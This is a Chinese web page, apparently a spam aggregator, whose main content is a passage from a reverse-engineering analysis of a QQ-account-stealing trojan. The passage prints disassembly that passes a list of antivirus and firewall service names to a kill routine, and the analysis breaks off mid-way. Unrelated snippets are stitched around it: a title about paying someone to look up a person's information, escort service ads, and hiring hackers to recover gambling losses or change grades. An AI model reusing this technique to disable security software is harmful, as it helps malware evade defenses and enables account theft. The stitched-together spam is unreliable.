找个 *** 要多少钱(查一个人的信息需要多

访客4年前黑客工具918

啊拉 *** 大盗有几个部分,大家看一下他的功能: 运行后关闭 *** ,安装后删除自身,过滤重复号码,彻底坠毁防火墙等等.其中我最感兴趣的还是看看啊拉 *** 大盗是怎么坠毁防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳 *** ,所以叫冷 *** 生帮我脱了.废话少说,下面是反汇编代码: Copy code .shrink:0040A0AA mov eax, offset s_Rsccenter ; "RsCCenter" .shrink:0040A0AF call sub_4095FC ;干掉如下防火墙服务.. .shrink:0040A0AF .shrink:0040A0B4 mov eax, offset s_Kvsrvxp ; "KVSrvXP" .shrink:0040A0B9 call sub_4095FC .shrink:0040A0B9 .shrink:0040A0BE mov eax, offset s_Kavsvc ; "kavsvc" .shrink:0040A0C3 call sub_4095FC .shrink:0040A0C3 .shrink:0040A0C8 mov eax, offset s_Kpfwsvc ; "KPfwSvc" .shrink:0040A0CD call sub_4095FC .shrink:0040A0CD .shrink:0040A0D2 mov eax, offset s_Kwatchsvc ; "KWatchSvc" .shrink:0040A0D7 call sub_4095FC .shrink:0040A0D7 .shrink:0040A0DC mov eax, offset s_Wscsvc ; "wscsvc" .shrink:0040A0E1 call sub_4095FC .shrink:0040A0E1 .shrink:0040A0E6 mov eax, offset s_Sndsrvc ; "SNDSrvc" .shrink:0040A0EB call sub_4095FC .shrink:0040A0EB .shrink:0040A0F0 mov eax, offset s_Ccproxy ; "ccProxy" .shrink:0040A0F5 call sub_4095FC .shrink:0040A0F5 .shrink:0040A0FA mov eax, offset s_Ccevtmgr ; "ccEvtMgr" .shrink:0040A0FF call sub_4095FC .shrink:0040A0FF .shrink:0040A104 mov eax, offset s_Ccsetmgr ; "ccSetMgr" .shrink:0040A109 call sub_4095FC .shrink:0040A109 .shrink:0040A10E mov eax, offset s_Spbbcsvc ; "SPBBCSvc" .shrink:0040A113 call sub_4095FC .shrink:0040A113 .shrink:0040A118 mov eax, offset s_SymantecCoreL ; "Symantec Core LC" .shrink:0040A11D call sub_4095FC .shrink:0040A11D .shrink:0040A122 mov eax, offset s_Navapsvc ; "navapsvc" .shrink:0040A127 call sub_4095FC .shrink:0040A127 .shrink:0040A12C mov eax, offset s_Npfmntor ; "NPFMntor" .shrink:0040A131 call sub_4095FC .shrink:0040A131 .shrink:0040A136 mov eax, offset s_Mskservice ; "MskService" .shrink:0040A13B call sub_4095FC .shrink:0040A13B .shrink:0040A140 mov eax, offset s_Mctaskmanager ; "McTaskManager" .shrink:0040A145 call sub_4095FC .shrink:0040A145 .shrink:0040A14A mov eax, offset s_Mcshield ; "McShield" .shrink:0040A14F call sub_4095FC .shrink:0040A14F .shrink:0040A154 mov eax, offset s_Mcafeeframewo ; "McAfeeFramework" .shrink:0040A159 call sub_4095FC .shrink:0040A159 .shrink:0040A15E .shrink:0040A15E loc_40A15E: ; CODE XREF: .shrink:0040A16D j .shrink:0040A15E call sub_409064 .shrink:0040A15E .shrink:0040A163 push 0BB8h .shrink:0040A168 call Sleep ;休眠 .shrink:0040A168 .shrink:0040A16D jmp short loc_40A15E .shrink:0040A16D 很明显,通过一个参数传递给sub_4095FC这个分支,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样构造:char sub_4095FC(int buffer)(C语言语法)把这个名称传递给sub_4095FC干什么捏?大家请看sub_4095FC这个分支: Copy code .shrink:004095FC sub_4095FC proc near

相关文章

北京商务上门预约服务内容资料联系方式价

 “北京商务上门预约服务内容资料联系方式价格报酬”10丹东的乔先生的评价:这次安排的是一个职业空乘,小姐姐打扮的真洋气,倍儿有面儿。 北京商务上门预约服务内容资料联系方式价格报酬,17.模特资料-身...

找黑客弄回网赌输的钱犯法吗(网赌输咯找黑客有用吗)

你好,这是根据实际情况而定,但可以肯定的是需要一段时间警方才能搜集到全部的证据抓涉案人员,至于你的钱就会被没收,就算你再傻也知道那是赌博,所以你也。 1,由于输了几十万,金额巨大,假如赌输的钱并未给到...

赌博输了钱可以报警吗

· Windows Server 2008;漏洞复现Windows 操作系统test.local赌博输了钱可以报警吗, Cmdguard.sys会暴露一个名为cmdServicePort的过滤端口。...

走着瞧qvod

《我的机器人女友》感人《大内密探零零狗》搞笑——————————————————————————这里有观看最新电影就来太阳影视观。 周星驰系列的都可以么,三傻闹堡来坞,欢天喜乐会之王老虎抢亲 新片不太...

找黑客改成绩多少钱(找黑客修改成绩)

各行各业都有一个价值的问题,你觉得就一分,不值,但你能改得了吗?如果因为这一分,你出不了国,你用十个6000能换回来吗?这就是价值的体现。也许你。 孩子,面对事实吧,这次没考好,下次考好。考不好哪怕让...

糖尿病的并发症有哪些(治糖尿病最好的方法)

  糖尿病患者的病发症有什么(治糖尿病患者最好是的方式)如今的社会,伴随着大家生活水平的提升,得上糖尿病患者的人也愈来愈多了,糖尿病患者称之为富贵病,和大家的饮食结构有非常大关联,糖尿病患者并不恐怖,...